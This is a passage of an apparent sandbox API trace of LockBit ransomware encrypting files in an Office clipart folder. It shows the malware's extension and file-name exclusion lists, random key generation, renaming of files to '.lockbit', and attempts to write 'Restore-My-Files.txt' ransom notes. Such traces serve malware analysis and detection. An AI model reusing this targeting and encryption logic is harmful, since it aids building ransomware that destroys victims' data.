lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0154.221] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88613900, ftCreationTime.dwHighDateTime=0x1bee442, ftLastAccessTime.dwLowDateTime=0x5661b6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x88613900, ftLastWriteTime.dwHighDateTime=0x1bee442, nFileSizeHigh=0x0, nFileSizeLow=0x30f2, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0281640.WMF", cAlternateFileName="")) returned 1 [0154.221] lstrcmpiW (lpString1=".", lpString2="J0281640.WMF") returned -1 [0154.221] lstrcmpiW (lpString1="..", lpString2="J0281640.WMF") returned -1 [0154.221] PathFindExtensionW (pszPath="J0281640.WMF") returned=".WMF" [0154.221] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0154.221] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0154.221] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0154.221] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0154.221] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0154.221] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0154.221] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0154.221] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0154.222] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0154.222] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0154.222] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0154.222] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0154.222] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0154.222] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0154.222] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0154.222] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0154.222] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0154.222] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0154.222] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0154.222] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0154.222] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0154.222] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0154.222] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0154.222] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0154.222] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.222] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0154.222] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0154.222] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0154.223] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0154.223] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0154.223] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0154.223] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0154.223] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0154.223] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0154.223] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0154.223] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0154.223] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0154.223] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0154.223] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0154.223] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0154.223] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0154.223] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0154.223] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.223] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0154.223] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0154.223] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0154.223] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0154.223] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0281640.WMF") returned 1 [0154.224] lstrcmpiW (lpString1="ntldr", lpString2="J0281640.WMF") returned 1 [0154.224] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0281640.WMF") returned 1 [0154.224] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0281640.WMF") returned -1 [0154.224] lstrcmpiW (lpString1="autorun.inf", lpString2="J0281640.WMF") returned -1 [0154.224] lstrcmpiW (lpString1="thumbs.db", lpString2="J0281640.WMF") returned 1 [0154.224] lstrcmpiW (lpString1="iconcache.db", lpString2="J0281640.WMF") returned -1 [0154.224] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0154.224] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281640.WMF") returned=".WMF" [0154.224] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0154.224] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0154.224] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0154.224] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0154.224] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0154.224] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0154.224] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0154.224] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0154.224] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0154.224] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0154.224] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0154.224] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0154.224] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0154.225] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0154.225] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0154.225] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0154.225] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0154.225] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0154.225] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0154.225] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0154.225] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0154.225] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0154.225] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0154.225] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0154.225] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0154.225] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0154.225] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0154.225] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0154.225] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281640.WMF.lockbit") returned 72 [0154.225] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281640.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0281640.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0154.226] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0154.226] malloc (_Size=0x40068) returned 0x3df0008 [0154.227] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=12530) returned 1 [0154.227] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.227] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.227] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0154.227] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.228] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.228] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0154.228] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0154.233] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281640.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281640.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0154.233] malloc (_Size=0xa6) returned 0x1fa2ed8 [0154.233] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0154.238] free (_Block=0x1fa2ed8) [0154.238] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281640.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0154.238] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0154.238] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0154.238] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba8f5800, ftCreationTime.dwHighDateTime=0x1beecd8, ftLastAccessTime.dwLowDateTime=0x5661b6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xba8f5800, ftLastWriteTime.dwHighDateTime=0x1beecd8, nFileSizeHigh=0x0, nFileSizeLow=0x3c9e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0282126.WMF", cAlternateFileName="")) returned 1 [0154.238] lstrcmpiW (lpString1=".", lpString2="J0282126.WMF") returned -1 [0154.238] lstrcmpiW (lpString1="..", lpString2="J0282126.WMF") returned -1 [0154.238] PathFindExtensionW (pszPath="J0282126.WMF") returned=".WMF" [0154.238] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0154.238] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0154.238] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0154.238] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0154.238] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0154.238] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0154.238] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0154.238] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0154.238] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0154.238] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0154.238] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0154.239] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0154.239] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0154.239] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0154.239] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0154.239] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0154.239] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0154.239] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0154.239] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0154.239] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0154.239] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0154.239] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0154.239] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0154.239] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0154.239] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.239] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0154.239] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0154.239] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0154.239] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0154.239] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0154.239] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0154.239] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0154.239] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0154.240] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0154.240] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0154.240] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0154.240] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0154.240] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0154.240] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0154.240] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0154.240] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0154.240] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0154.240] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.240] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0154.240] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0154.240] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0154.240] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0154.240] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0282126.WMF") returned 1 [0154.240] lstrcmpiW (lpString1="ntldr", lpString2="J0282126.WMF") returned 1 [0154.240] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0282126.WMF") returned 1 [0154.240] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0282126.WMF") returned -1 [0154.240] lstrcmpiW (lpString1="autorun.inf", lpString2="J0282126.WMF") returned -1 [0154.240] lstrcmpiW (lpString1="thumbs.db", lpString2="J0282126.WMF") returned 1 [0154.240] lstrcmpiW (lpString1="iconcache.db", lpString2="J0282126.WMF") returned -1 [0154.240] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0154.240] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0282126.WMF") returned=".WMF" [0154.240] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0154.241] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0154.241] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0154.241] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0154.241] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0154.241] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0154.241] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0154.241] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0154.241] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0154.241] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0154.241] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0154.241] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0154.241] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0154.241] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0154.241] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0154.241] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0154.241] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0154.241] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0154.241] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0154.241] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0154.241] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0154.241] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0154.242] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0154.242] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0154.242] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0154.242] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0154.242] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0154.242] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0154.242] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0282126.WMF.lockbit") returned 72 [0154.242] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0282126.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0282126.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0154.243] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0154.243] malloc (_Size=0x40068) returned 0x3df0008 [0154.243] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=15518) returned 1 [0154.243] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.244] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0154.244] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.244] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0154.244] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0154.250] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0282126.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0282126.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0154.250] malloc (_Size=0xa6) returned 0x1fa2ed8 [0154.251] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0154.251] free (_Block=0x1fa2ed8) [0154.251] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0282126.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0154.251] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0154.251] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0154.251] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x660f04f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x8166, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0282928.WMF", cAlternateFileName="")) returned 1 [0154.251] lstrcmpiW (lpString1=".", lpString2="J0282928.WMF") returned -1 [0154.251] lstrcmpiW (lpString1="..", lpString2="J0282928.WMF") returned -1 [0154.251] PathFindExtensionW (pszPath="J0282928.WMF") returned=".WMF" [0154.252] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0154.252] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0154.252] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0154.252] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0154.252] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0154.252] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0154.252] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0154.252] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0154.252] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0154.252] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0154.252] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0154.252] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0154.252] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0154.252] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0154.252] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0154.252] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0154.252] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0154.252] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0154.252] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0154.252] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0154.252] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0154.252] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0154.252] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0154.252] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0154.252] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.253] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0154.253] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0154.253] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0154.253] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0154.253] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0154.253] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0154.253] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0154.253] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0154.253] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0154.253] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0154.253] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0154.253] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0154.253] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0154.253] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0154.253] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0154.253] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0154.253] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0154.253] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.253] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0154.253] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0154.253] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0154.253] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0154.254] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0282928.WMF") returned 1 [0154.254] lstrcmpiW (lpString1="ntldr", lpString2="J0282928.WMF") returned 1 [0154.254] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0282928.WMF") returned 1 [0154.254] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0282928.WMF") returned -1 [0154.254] lstrcmpiW (lpString1="autorun.inf", lpString2="J0282928.WMF") returned -1 [0154.254] lstrcmpiW (lpString1="thumbs.db", lpString2="J0282928.WMF") returned 1 [0154.254] lstrcmpiW (lpString1="iconcache.db", lpString2="J0282928.WMF") returned -1 [0154.254] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0154.254] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0282928.WMF") returned=".WMF" [0154.254] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0154.254] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0154.254] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0154.254] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0154.254] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0154.254] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0154.254] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0154.254] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0154.254] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0154.254] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0154.254] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0154.254] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0154.255] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0154.255] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0154.255] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0154.255] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0154.255] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0154.255] lstrcmpiW (lpString1=".mwb", 